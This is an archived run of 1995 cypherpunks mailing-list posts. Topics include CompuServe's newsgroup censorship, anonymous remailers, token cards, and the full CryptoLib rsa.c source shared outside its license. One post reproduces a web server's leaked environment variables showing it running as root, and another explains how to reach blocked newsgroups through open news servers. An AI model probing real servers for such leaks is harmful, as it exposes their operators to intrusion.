Property rights *are* fundamental to many other human rights, but they
aren't the exclusive basis of them.  The right of self-determination
isn't based in property (except to the extent that one may be said to
inalienably own oneself, but this is really an analogy), and is equally
fundamental to human rights.

Many of the issues related to workplace privacy concerns exhibit
conflicts between these two.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
Date: Thu, 28 Dec 95 14:12:55 PST
To: adam@lighthouse.homeport.org (Adam Shostack)
Subject: Re: URL for cypherpunks
In-Reply-To: <199512281556.KAA05580@homeport.org>
Message-ID: <30e316546c20002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


According to rumor, Adam Shostack said:
> 
> 	The csua.cs.bezerkely site is good, but hasn't been maintained
> in a while.  (Unfortunately, there is enough cypherpunk & related
> stuff out there that maintaining a really good site would be a full
> time job.  Thats not a flame at any of the people out there who do good
> work, just a wish for a really well organized www.cypherpunks.org
> library & pointer list, should someone decide to pay for it. :)

Looks like someone has...

maroon% whois2 cypherpunks.org
CypherPunks Group (CYPHERPUNKS3-DOM)
   9705 Standford Road
   Ft. Meade, MD 20755
 
   Domain Name: CYPHERPUNKS.ORG
 
   Administrative Contact, Technical Contact, Zone Contact:
      One, Aleph  (EML2)  aleph1@DFW.NET
      999-999-9999
 
   Record last updated on 03-Oct-95.
   Record created on 03-Oct-95.
 
   Domain servers in listed order:
 
   DNS.CYBERWORKS.NET           205.164.71.20
   NS2.PARANOIA.COM             204.157.153.18
   WKP.COM                      205.199.64.11
 
 
The InterNIC Registration Services Host contains ONLY Internet Information
(Networks, ASN's, Domains, and POC's).
Please use the whois server at nic.ddn.mil for MILNET Information.

maroon% host www.cypherpunks.org
www.cypherpunks.org is a nickname for cypherpunks.org
cypherpunks.org has address 205.164.71.100


-- 
Kevin L. Prigge         |"Have you ever gotten tired of hearing those 
UofM Central Computing  | ridiculous AT&T commercials claiming credit 
email: klp@tc.umn.edu   | for things that don't even exist yet? 
010010011101011001100010| You will." -Emmanuel Goldstein 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gorkab@sanchez.com (Brian Gorka)
Date: Thu, 28 Dec 95 14:01:43 PST
To: "'cypherpunks@toad.com>
Subject: IwinPak
Message-ID: <01BAD546.1C3B8640@loki>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone ever seen or heard of this company?  They use PGP as an encryption transport for secure mail and transactions (at a price of course)

http://www.iwinpak.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Thu, 28 Dec 95 09:21:40 PST
To: cypherpunks@toad.com
Subject: Cryptolib 1.1 rsa.c
Message-ID: <199512281722.RAA18284@pangaea.ang.ecafe.org>
MIME-Version: 1.0
Content-Type: text/plain


I am informed that there is a serious bug in the version of cryptolib
that gets sent to people who don't have RSA licenses.  The bug
prevents it from doing RSA encrypt, decrypt or signature.  I cannot
imagine how this bug slipped through but it seems only to exist in the
copies of cryptolib that are sent to those without RSA licenses.
Fortunately I have an RSA licesnse and so my new copy (thanks Jack and
Matt!) does not suffer from the bug.

Here is the version of rsa.c that fixes the bug.

/*
 * This is version 1.1 of CryptoLib
 *
 * The authors of this software are Jack Lacy, Don Mitchell and Matt Blaze
 *              Copyright (c) 1991, 1992, 1993, 1994, 1995 by AT&T.
 * Permission to use, copy, and modify this software without fee
 * is hereby granted, provided that this entire notice is included in
 * all copies of any software which is or includes a copy or
 * modification of this software and in all copies of the supporting
 * documentation for such software.
 *
 * NOTE:
 * Some of the algorithms in cryptolib may be covered by patents.
 * It is the responsibility of the user to ensure that any required
 * licenses are obtained.
 *
 *
 * SOME PARTS OF CRYPTOLIB MAY BE RESTRICTED UNDER UNITED STATES EXPORT
 * REGULATIONS.
 *
 *
 * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
 * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
 * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
 * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.
 */

/*
 *        Code for generating and manipulating RSA keys
 *        and doing encryption and decryption using RSA.
 *        AT&T recognizes that RSA is patented
 *        (Rivest et. al. U.S. Patent 4,405,829, issued 9/20/83).
 *	  Use of this code assumes proper licensing.
 *
 *        coded by Jack Lacy, December, 1991
 *
 */
#include "libcrypt.h"

static Key_exps *genKeyExps P((BigInt, BigInt, BigInt, int, BigInt));
static void chineseRemTheorem P((BigInt , RSAPrivateKey *, BigInt));
static void genPrimesFor3 P((int, BigInt, BigInt, BigInt, BigInt));

#ifdef K_AND_R
static Key_exps *
genKeyExps(p, q, e, ebits, randomStart)
  BigInt p, q, e;
  int ebits;
  BigInt randomStart;
#else
  static Key_exps *genKeyExps(BigInt p,
			      BigInt q,
			      BigInt e,
			      int ebits,
			      BigInt randomStart)
#endif
{
	BigInt phi, p1, q1;
	BigInt u1, ngcd, ignore;
	Key_exps *exps;
	int ebytes;
#ifdef DLLEXPORT
	HGLOBAL handle = clib_malloc(sizeof(Key_exps));
	exps = (Key_exps *)GlobalLock(handle);
	exps->exp_handle = handle;
#else
	exps = (Key_exps *)clib_malloc(sizeof(Key_exps));
#endif
	p1 = bigInit(0);
	q1 = bigInit(0);
	phi = bigInit(0);
	u1  = bigInit(0);
	ngcd = bigInit(0);
	ignore = bigInit(0);
	if (e == NULL)
		e = bigInit(3);
	
	bigSubtract(p, one, p1);
	bigSubtract(q, one, q1);
	bigMultiply(p1, q1, phi);
	freeBignum(p1);
	freeBignum(q1);
	
	/* Get public exponent, relatively prime to modulus. */
	/* A by product of the extendedGcd calculation is the inverse
	   of e mod phi, which is d, the private exponent.
	   If e has been specified, skip this.
	 */
	if (e == NULL) {
		if (ebits > 2) {
			ebytes = (ebits/8) + (ebits%8? 1: 0);
			if (randomStart == NULL) {
				bigRand(ebytes, e, PSEUDO);
			}
			else {
				bigCopy(randomStart, e);
			}
			if (EVEN(e))
				bigAdd(e, one, e);
		}
	}
	extendedGcd(e, phi, u1, ignore, ngcd);
	while (bigCompare(ngcd, one) != 0) {
		bigAdd(e, two, e);
		extendedGcd(e, phi, u1, ignore, ngcd);
	}
	exps->d = u1;
	exps->e = e;
	
	freeBignum(phi);
	freeBignum(ngcd);
	freeBignum(ignore);
	
	return exps;
}

#ifdef K_AND_R
_TYPE( RSAPublicKey * )
buildRSAPublicKey(e, n)
  BigInt e, n;
#else
_TYPE( RSAPublicKey * ) buildRSAPublicKey(BigInt e,
					  BigInt n)
#endif
{
	RSAPublicKey *pk;
#ifdef DLLEXPORT
	HGLOBAL handle = clib_malloc(sizeof(RSAPublicKey));
	pk = (RSAPublicKey *)GlobalLock(handle);
	pk->pubkey_handle = handle;
#else
	pk = (RSAPublicKey *)clib_malloc(sizeof(RSAPublicKey));
#endif
	pk->publicExponent = e;
	pk->modulus = n;
	return pk;
}

#ifdef K_AND_R
_TYPE( RSAPrivateKey * )
buildRSAPrivateKey(e, d, p, q, dp, dq, c12)
  BigInt e, d, p, q, dp, dq, c12;
#else
_TYPE( RSAPrivateKey * ) buildRSAPrivateKey(BigInt e,
					    BigInt d,
					    BigInt p,
					    BigInt q,
					    BigInt dp,
					    BigInt dq,
					    BigInt c12)
#endif
{
	RSAPrivateKey *pk;
	ChineseRemStruct *crt;
#ifdef DLLEXPORT
	HGLOBAL crt_handle = clib_malloc(sizeof(ChineseRemStruct));
	HGLOBAL handle = clib_malloc(sizeof(RSAPrivateKey));
	crt = (ChineseRemStruct *)GlobalLock(crt_handle);
	crt->crt_handle = crt_handle;
	pk = (RSAPrivateKey *)GlobalLock(handle);
	pk->privkey_handle = handle;
#else
	crt = (ChineseRemStruct *)clib_malloc(sizeof(ChineseRemStruct));
	pk = (RSAPrivateKey *)clib_malloc(sizeof(RSAPrivateKey));
#endif
	
	pk->publicExponent = e;
	pk->privateExponent = d;
	pk->modulus = bigInit(0);
	bigMultiply(p, q, pk->modulus);
	
	pk->crt = crt;
	pk->crt->p = p;
	pk->crt->q = q;
	pk->crt->dp = dp;
	pk->crt->dq = dq;
	pk->crt->c12 = c12;
	
	return pk;
}

#ifdef K_AND_R
_TYPE( RSAKeySet * )
buildRSAKeySet(e, d, p, q)
  BigInt e, d, p, q;
#else
_TYPE( RSAKeySet * ) buildRSAKeySet(BigInt e,
				    BigInt d,
				    BigInt p,
				    BigInt q)
#endif
{
	BigInt pminus1, qminus1, n, dp, dq, c12;
	BigInt ecopy, dcopy;
	RSAKeySet *ks;
#ifdef DLLEXPORT
	HGLOBAL ks_handle = clib_malloc(sizeof(RSAKeySet));
	ks = (RSAKeySet *)GlobalLock(ks_handle);
	ks->keyset_handle = ks_handle;
#else
	ks = (RSAKeySet *)clib_malloc(sizeof(RSAKeySet));
#endif
	n = bigInit(0);
	bigMultiply(p, q, n);
	
	ecopy = bigInit(0);
	bigCopy(e, ecopy);
	ks->publicKey = buildRSAPublicKey(ecopy, n);
	
	pminus1 = bigInit(0);
	qminus1 = bigInit(0);
	bigSubtract(p, one, pminus1);
	bigSubtract(q, one, qminus1);
	
	dp = bigInit(0);
	dq = bigInit(0);
	bigMod(d, pminus1, dp);
	bigMod(d, qminus1, dq);
	
	c12 = bigInit(0);
	getInverse(q, p, c12);

	ecopy = bigInit(0);
	bigCopy(e, ecopy);
	dcopy = bigInit(0);
	bigCopy(d, dcopy);
	ks->privateKey = buildRSAPrivateKey(ecopy, dcopy, p, q,
					    dp, dq, c12);
	
	freeBignum(pminus1);
	freeBignum(qminus1);
	
	return ks;
}


#ifdef K_AND_R
static void
genPrimesFor3(nbits, p, q, r1, r2)
  int nbits;
  BigInt p, q, r1, r2;
#else
  static void genPrimesFor3(int nbits,
			    BigInt p,
			    BigInt q,
			    BigInt r1,
			    BigInt r2)
#endif
{
	BigInt ngcd, ignore, three, pminus1, qminus1;
	
	ignore = bigInit(0);
	three = bigInit(3);
	pminus1 = bigInit(0);
	qminus1 = bigInit(0);

	/* Gordon algorithm doesn't care about the p-1 factor size */
	genStrongPrimeSet(nbits/2, p, (int)NULL, ignore, GORDON, r1);
	bigSubtract(p, one, pminus1);
	ngcd = gcd(three, pminus1);
	while (bigCompare(ngcd, one) != 0) {
		if (r1 != NULL)
			randomize(r1);
		freeBignum(ngcd);
		genStrongPrimeSet(nbits/2, p, (int)NULL, ignore, GORDON, r1);
		bigSubtract(p, one, pminus1);
		ngcd = gcd(three, pminus1);
	}
	freeBignum(ngcd);
	
	genStrongPrimeSet(nbits/2, q, (int)NULL, ignore, GORDON, r2);
	bigSubtract(q, one, qminus1);
	ngcd = gcd(three, qminus1);
	while (bigCompare(ngcd, one) != 0) {
		if (r2 != NULL)
			randomize(r2);
		freeBignum(ngcd);
		genStrongPrimeSet(nbits/2, q, (int)NULL, ignore, GORDON, r2);
		bigSubtract(q, one, qminus1);
		ngcd = gcd(three, qminus1);
	}
	freeBignum(ngcd);
	freeBignum(pminus1);
	freeBignum(qminus1);
	freeBignum(ignore);
	freeBignum(three);
}


#ifdef K_AND_R
_TYPE( int )
randBytesNeededForRSA (modlen, ebits)
  int modlen, ebits;
#else
_TYPE( int ) randBytesNeededForRSA (int modlen, int ebits)
#endif
{
	int bytes;

	bytes = ((modlen + ebits)/8) + ((modlen+ebits)%8? 1: 0);

	return bytes;
}

#ifdef K_AND_R
_TYPE( RSAKeySet * )
genRSAKeySet(nbits, ebits, e, randomStart)
  Ulong nbits, ebits, randomStart;
  BigInt e;
#else
_TYPE( RSAKeySet * ) genRSAKeySet(int nbits,
				  int ebits,
				  BigInt e,
				  BigInt randomStart)
#endif
{
	BigInt p, q, ignore, r1, r2;
	Key_exps *exps;
	RSAKeySet *key_set;
	int oldlen;
	BigInt randStart;
	
	p = bigInit(0);
	q = bigInit(0);
	r1 = NULL;
	r2 = NULL;
	randStart = NULL;
	if (randomStart != NULL) {
		r1 = bigInit(0);
		r2 = bigInit(0);
		randStart = bigInit(0);
		bigCopy(randomStart, randStart);
		oldlen = LENGTH(randStart);
		LENGTH(randStart) = nbits/32/2;
		bigCopy(randStart, r1);
		LENGTH(randStart) = oldlen;
		bigRightShift(randStart, nbits/2, randStart);
		oldlen = LENGTH(randStart);
		LENGTH(randStart) = nbits/32/2;
		bigCopy(randStart, r2);
		LENGTH(randStart) = oldlen;
		bigRightShift(randStart, nbits/2, randStart);
	}
	if (ebits == 2)
		genPrimesFor3(nbits, p, q, r1, r2);
	
	else {
		ignore = bigInit(0);
		genStrongPrimeSet(nbits/2, p, (int)NULL, ignore, GORDON, r1);
		genStrongPrimeSet(nbits/2, q, (int)NULL, ignore, GORDON, r2);
		freeBignum(ignore);
	}
	exps = genKeyExps(p, q, e, ebits, randStart);
	key_set = buildRSAKeySet(exps->e, exps->d, p, q);
	freeBignum(exps->e);
	freeBignum(exps->d);
	if (r1 != NULL) {
		freeBignum(r1);
		freeBignum(r2);
		freeBignum(randStart);
	}
#ifdef DLLEXPORT
	GlobalUnlock(exps->exp_handle);
	GlobalFree(exps->exp_handle);
#else
	free((char *)exps);
#endif
	return key_set;
}


/*
   Chinese Remainder Theorem reconstruction of m^d mod n, using
   m^dp mod p and m^dq mod q with dp = d mod p-1, dq = d mod q-1.
   */
#ifdef K_AND_R
static void
chineseRemTheorem(m, key, em)
  BigInt m, em;
  RSAPrivateKey *key;
#else
  static void chineseRemTheorem(BigInt m,
				RSAPrivateKey *key,
				BigInt em)
#endif
{
	BigInt u1, u2;
	BigInt p, q, dp, dq, c12;
	
	p = key->crt->p;
	q = key->crt->q;
	dp = key->crt->dp;
	dq = key->crt->dq;
	c12 = key->crt->c12;
	
	u1 = bigInit(0);
	u2 = bigInit(0);

	bigPow(m, dp, p, u1);
	bigPow(m, dq, q, u2);
	
	crtCombine(u1, u2, p, q, c12, em);
	
	freeBignum(u1);
	freeBignum(u2);
	
}

#ifdef K_AND_R
_TYPE( void )
freeRSAPublicKey(pk)
  RSAPublicKey *pk;
#else
_TYPE( void ) freeRSAPublicKey(RSAPublicKey *pk)
#endif
{
	freeBignum(pk->publicExponent);
	freeBignum(pk->modulus);
#ifdef DLLEXPORT
	GlobalUnlock(pk->pubkey_handle);
	GlobalFree(pk->pubkey_handle);
#else
	free((char *)pk);
#endif
}

#ifdef K_AND_R
_TYPE( void )
freeRSAPrivateKey(pk)
  RSAPrivateKey *pk;
#else
_TYPE( void ) freeRSAPrivateKey(RSAPrivateKey *pk)
#endif
{
	freeBignum(pk->publicExponent);
	freeBignum(pk->privateExponent);
	freeBignum(pk->modulus);
	freeBignum(pk->crt->p);
	freeBignum(pk->crt->q);
	freeBignum(pk->crt->dp);
	freeBignum(pk->crt->dq);
	freeBignum(pk->crt->c12);
#ifdef DLLEXPORT
	GlobalUnlock(pk->crt->crt_handle);
	GlobalFree(pk->crt->crt_handle);
	GlobalUnlock(pk->privkey_handle);
	GlobalFree(pk->privkey_handle);
#else
	free((char *)pk->crt);
	free((char *)pk);
#endif	
}

#ifdef K_AND_R
_TYPE( void )
freeRSAKeys(ks)
  RSAKeySet *ks;
#else
_TYPE( void ) freeRSAKeys(RSAKeySet *ks)
#endif
{
	
	freeRSAPublicKey(ks->publicKey);
	freeRSAPrivateKey(ks->privateKey);
#ifdef DLLEXPORT
	GlobalUnlock(ks->keyset_handle);
	GlobalFree(ks->keyset_handle);
#else
	free((char *)ks);
#endif
}

#ifdef K_AND_R
_TYPE( BigInt )
RSAEncrypt(message, key)
  BigInt message;
  RSAPublicKey *key;
#else
_TYPE( BigInt ) RSAEncrypt(BigInt message,
			   RSAPublicKey *key)
#endif
{
	BigInt result;
	
	result = bigInit(3);
	if (bigCompare(key->publicExponent, result) == 0) {
		reset_big(result, 0);
		bigCube(message, key->modulus, result);
	}
	else {
		reset_big(result, 0);
		bigPow(message, key->publicExponent, key->modulus, result);
	}
	return result;
}

#ifdef K_AND_R
_TYPE( BigInt )
RSADecrypt(message, key)
  BigInt message;
  RSAPrivateKey *key;
#else
_TYPE( BigInt ) RSADecrypt(BigInt message,
			   RSAPrivateKey *key)
#endif
{
	BigInt result;
	
	result = bigInit(0);
	
	chineseRemTheorem(message, key, result);
	return result;
	
}


#ifdef K_AND_R
_TYPE( RSASignature * )
RSASign(message, key)
  BigInt message;
  RSAPrivateKey *key;
#else
_TYPE( RSASignature * ) RSASign(BigInt message,
				RSAPrivateKey *key)
#endif
{
	return (RSASignature *)RSADecrypt(message, key);
}


#ifdef K_AND_R
_TYPE( Boolean )
RSAVerify(message, sig, key)
  BigInt message;
  RSASignature *sig;
  RSAPublicKey *key;
#else
_TYPE( Boolean ) RSAVerify(BigInt message,
			   RSASignature *sig,
			   RSAPublicKey *key)
#endif
{
	Boolean retval;
	BigInt cmp;
	
	cmp = (BigInt)RSAEncrypt((BigInt)sig, key);
	
	if (bigCompare(message, cmp) == 0)
		retval = TRUE;
	else
		retval = FALSE;
	
	freeBignum(cmp);
	
	return retval;
}

#ifdef K_AND_R
_TYPE( void )
freeRSASig(sig)
  RSASignature *sig;
#else
_TYPE( void ) freeRSASig(RSASignature *sig)
#endif
{
	freeBignum((BigInt)sig);
}

#ifdef K_AND_R
_TYPE( void )
RSAPrivateKeyDesEncrypt(pk, deskey)
  RSAPrivateKey *pk;
  unsigned char *deskey;
#else
_TYPE( void )
RSAPrivateKeyDesEncrypt(RSAPrivateKey *pk, unsigned char *deskey)
#endif
{
	bignumDesEncrypt(pk->publicExponent, deskey);
	bignumDesEncrypt(pk->privateExponent, deskey);
	bignumDesEncrypt(pk->modulus, deskey);
	bignumDesEncrypt(pk->crt->p, deskey);
	bignumDesEncrypt(pk->crt->q, deskey);
	bignumDesEncrypt(pk->crt->dp, deskey);
	bignumDesEncrypt(pk->crt->dq, deskey);
	bignumDesEncrypt(pk->crt->c12, deskey);
}

#ifdef K_AND_R
_TYPE( void )
RSAPrivateKeyDesDecrypt(pk, deskey)
  RSAPrivateKey *pk;
  unsigned char *deskey;
#else
_TYPE( void )
RSAPrivateKeyDesDecrypt(RSAPrivateKey *pk, unsigned char *deskey)
#endif
{
	bignumDesDecrypt(pk->publicExponent, deskey);
	bignumDesDecrypt(pk->privateExponent, deskey);
	bignumDesDecrypt(pk->modulus, deskey);
	bignumDesDecrypt(pk->crt->p, deskey);
	bignumDesDecrypt(pk->crt->q, deskey);
	bignumDesDecrypt(pk->crt->dp, deskey);
	bignumDesDecrypt(pk->crt->dq, deskey);
	bignumDesDecrypt(pk->crt->c12, deskey);
}

#ifdef K_AND_R
_TYPE( BigInt )
quantized_RSADecrypt(m, key)
  BigInt m;
  RSAPrivateKey *key;
#else
_TYPE( BigInt )
quantized_RSADecrypt(BigInt m, RSAPrivateKey *key)
#endif
{
	BigInt result;

	start_quantize(STD_QUANTUM);
	result = RSADecrypt(m, key);
	end_quantize();

	return result;
}


#ifdef K_AND_R
_TYPE( RSASignature *)
quantized_RSASign(m, key)
  BigInt m;
  RSAPrivateKey *key;
#else
_TYPE( RSASignature *)
quantized_RSASign(BigInt m, RSAPrivateKey *key)
#endif
{
	return (RSASignature *)quantized_RSADecrypt(m, key);
}





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Thu, 28 Dec 95 10:11:43 PST
To: cypherpunks@toad.com
Subject: Premail web server strangeness
Message-ID: <199512281811.FAA20893@suburbia.net>
MIME-Version: 1.0
Content-Type: text


Suprising amount of information one can gain from an env array, really.
....


                                                               SORRY


DISPLAY=callisto:0.0
EDITOR=/usr/sww/bin/emacsclient
HOME=/
HOST=kiwi.cs.berkeley.edu
HOSTTYPE=alpha
LOGNAME=root
LPDEST=lws510
MACHTYPE=alpha
MAIL=/var/spool/mail/raph
MANPATH=/private/raph/man:/usr/kerberos/man:/usr/sww/man:/usr/sww/X11/man:/usr/man:/usr/local/man
MITSCHEME_LIBRARY_PATH=/usr2/fa92/c263/scheme/lib
MPL=CMMD
NNTPSERVER=agate
OSTYPE=osf1
PAGER=/usr/sww/bin/less -r
PATH=/usr/bin:/usr/sww/bin
PGPPATH=/private/raph/.pgp
PRINTER=lws510
PWD=/private/raph
REMOTEHOST=callisto.HIP.Berkeley.EDU
SHELL=/bin/sh
SHLVL=2
TERM=xterm
USER=root
VENDOR=dec
SERVER_SOFTWARE=Raph's li'l server 0.04
HTTP_ACCEPT=application/x-csh
HTTP_FROM=
HTTP_REFERER=http://kiwi.cs.berkeley.edu/cgi-bin/premail-0.42.tar.gz?question1=Yes&question2=Yes
HTTP_USER_AGENT=
QUERY_STRING=question1=Yes&question2=Yes



   Sorry, can't serve the document.

-- 
+----------------------------------+-----------------------------------------+
|Julian Assange                    | "if you think the United  States has    |
|FAX: +61-3-9819-9066              |  has stood still, who built the largest |
|EMAIL: proff@suburbia.net         |  shopping centre in the world?" - Nixon |
+----------------------------------+-----------------------------------------+



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 30 Dec 95 12:30:22 PST
To: cypherpunks@toad.com
Subject: Re: last straw
In-Reply-To: <v0300420cad0afe0c22d7@[129.46.82.92]>
Message-ID: <D7kXgD23w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dave Del Torto <ddt@lsd.com> writes:
> I've decided to cancel my CrampuNerve account and send the weasels a msg to
> telling them why. I encourage everyone here to do the same with your CI$
> account (if you still have one). These [insert colorful expletive here]s
> only understand one thing: cold ca$h. Thus, the only effective way to send
> them an indication of one's displeasure at their poor precedent-setting is
> to vote with one's wallet.

One could go one step further -- use free trial accounts to go to their
local boards and chat rooms and tell the truth, uring others to leave.

By the way, Cantor & Siegal were long-time CompuServe users before spamming
Usenet with their green card ad.

> Any who are still unfortunate enough to rely on CI$ for Internet/Usenet
> access are getting reamed price-wise anyway, not to mention suffering poor
> reliability and now access, so maybe a few of them could also take this
> opportunity to migrate to an ISP with some real "backbone."

A friend of mine tried to use CS to read Usenet and reported the following:

* There's a very small limit on the size of an article to post to Usenet;

* There's a tremendous delay before Usenet articles pass through their
gateway;

* He saw many articles at other sites that never made it to CS; he estimated
that about 30-50% of Usenet articles just never get thru;

* The expiration in many high-volume newsgroups is 3 days or less.

(I don't know how true this is; his impressions may be wrong.)

When he complained to CS about it, he was told that CS doesn't position itself
as an Internet service provider. They have a lot of proprietary content that's
not available via the internet. They don't expect people to use their services
to use Usenet or Internet e-mail.

And now comes the *point*:

There's much information on CompuServe that cannot be accessed from the outside.
One example is the very informative National Computer Security Association's
forum. I think it would be a fitting response if NCSA removed their forum
from CS. (There are other such for-pay forums, like SovSet', which can be
accessed from the internet without paying anything to CompuServe).

As it stands, there are people who will maintain their CS accounts to access
the NCSA forum (even though they find CS's actions repugnant). If you don't
like it, encourage the NCSA to move their forum elsewhere.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Sun, 31 Dec 95 03:58:09 PST
To: Michael Handler <grendel@netaxs.com>
Subject: Re: Massey, CEO of Compuserve, on Internet
In-Reply-To: <Pine.SUN.3.91.951229220043.25326A-100000@unix5.netaxs.com>
Message-ID: <9512311156.AA00347@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


you said:
|On Fri, 29 Dec 1995, Timothy C. May wrote:
|
|> Wow! I am watching the CEO of Compuserve being interviewed on CNBC, |>explaining how his company is "taking the high road by complying with the |>laws of Germany" in removing access to 200 Usenet groups.
|
|A blatant lie.
|

How this could ever be construed as "the high road" is beyond me.
Censorship and fascism tend to go hand in hand, I suppose it should
be no surprise to see this coming from de-dom.

Can we just start calling them CompuCensor instead of Compuserve?

Tim


________________________________________________________________
tfs@vampire.science.gmu.edu (NeXTmail, MIME)  Tim Scanlon
tfs@epic.org                (PGP key aval.)  crypto is good
Digital Encryption Systems Inc.             I own my own words





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 31 Dec 95 05:40:15 PST
To: cypherpunks@toad.com
Subject: Re: anon.penet addresses in .sigs
In-Reply-To: <199512311100.GAA18408@thor.cs.umass.edu>
Message-ID: <Ty7ygD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


futplex@pseudonym.com (Futplex) writes:
> The direct address is easier to use, especially for people whose mailers
> don't allow them to add arbitrary email headers. Note that the ratio of

I recall that anon.penet.fi can be used by those whose mailers don't allow
them to add new headers -- the extra headers can be placed in at the top
of the body and it'll recognize them.  Likewise cypherpunk remailers let
you add headers with ##. I've taught at least one extremely "non-technical"
user to use the cypherpunks remailers successfully.

> users of the various cypherpunk remailers to users of anon.penet is even
> lower than the S/N ratio on this list in December.

Like, negative????? :)

> In certain parts of Usenet, many people routinely advertise addresses at
> anon.penet (and similar services) in their .sigs (as Ed does) to make
> pseudonymized replies as convenient as possible. This is not a new phenomenon

My question was "why". I think I see the answer now.  Thank you.

Happy New Year!

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve14571@aol.com
Date: Sun, 31 Dec 95 06:15:34 PST
To: cypherpunks@toad.com
Subject: Re: Massey, CEO of Compuserve, on Internet
Message-ID: <951231091526_102864093@mail06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 95-12-30 21:34:12 EST, accessnt@ozemail.com.au (Mark
Neely) wrote:

I assume that C$ is only filtering the newsfeed as it hits German shores?
Please tell me
they aren't denying access to these "banned" newsgroups for all users
worldwide!

This is exactly what they are doing, Mr. Neely.  I am not familiar with
CompuServe, as I have never used it.  However, based on my understanding of
how Usenet operates, it would be possible to write software and incorporate
it into CompuServe software that would block German readers from the
"obscene" newsgroups.  CompuServe would rather score points with the mostly
ignorant general public by saying that they are becoming more
"family-oriented."

I get my access through America Online, and I am afraid that these monolith
online services (AOL, Delphi, Prodigy) will follow C$'s lead so they may also
say they are "family-oriented."

I will no longer send mail to addresses that end with "compuserve.com."  If
AOL decides to become family oriented, I will look for other ways to connect
to the net.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 31 Dec 95 06:49:51 PST
To: cypherpunks@toad.com
Subject: Compuserve *hasn't* banned newsgroups
Message-ID: <2.2.32.19951231145010.008c9658@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


So I'd heard that CompuServe had banned access to all those naughty
newsgroups including my favorite alt.binaries.erotic.senior-citizens.  Could
this be true?  I fired up my CompuServe Internet Dialer (the PPP software
packaged with WinCim and logged on to the nets.  Sure enough.  The popular
binaries groups were missing from news.compuserve.com.  But not to be
deterred...

I grabbed a copy of the Free Agent newsreader:

http://www2.interpath.net/forte/agent/freagent.htm

ftp.forteinc.com/pub/free_agent/fagent10.zip

I grabbed the latest list of open NNTP Servers from:

http://dana.ucc.nau.edu/~jwa/open-sites.html

I pointed my copy of Free Agent at CPCNET's open news server (198.70.185.5)
and grabbed a list of groups sure enough, there were the seasoned citizens
in all their glory.  And I was checking out those binaries via CompuServe.

Don't tell the Bavarians. 

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sun, 31 Dec 95 07:14:17 PST
To: Alan.Pugh@internetMCI.COM (amp)
Subject: Re: Australian "calculatorcard"
In-Reply-To: <01HZFQH4O0R695OXTW@MAIL-CLUSTER.PCY.MCI.NET>
Message-ID: <199512311459.JAA00430@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> sounds like the card i use for remote dialup to certain non-public
> systems i use at work. it has a six digit number on the front that
> changes every 60 seconds. 

Do these card systems use a window to handle clock-slip?

I'd think you could have the server safely accept # N, N-60 sec, and
N+60 seconds; and adjust the server's idea of your card's clock speed
from that.

What new risk would that create?

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 31 Dec 95 07:18:17 PST
To: cypherpunks@toad.com
Subject: SEY_use
Message-ID: <199512311518.KAA19667@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-31-95. WashP:

   Emulating US founding outlaws, the Seychelles government
   has enacted an investment law described by transatlantic
   neo-imperialists as a "Welcome, Criminals" act. The law
   offers anyone who invests $10 million or more in Seychelles
   -- no questions asked as to the source -- protection from
   extradition, from seizure of assets and to other
   "concessions and incentives commensurate with the
   investment." Neo-imps say this is "an open invitation to
   money launderers and other international criminals to set
   up shop with impunity." Under the statute the Seychelles
   government could grant diplomatic passports and other
   protections as a shield from thermonuclear pornography.

   SEY_use












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an5877@anon.penet.fi (deadbeat)
Date: Sun, 31 Dec 95 09:10:48 PST
To: cypherpunks@toad.com
Subject: Fred Cohen, PhD
Message-ID: <9512311704.AA03856@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Regarding Fred Cohen, PhD:

Cohen's haughty and bombastic style do nothing good for his reputation.  I
assume he advertises his PhD to highlight his early accomplishments; he has
done little since.

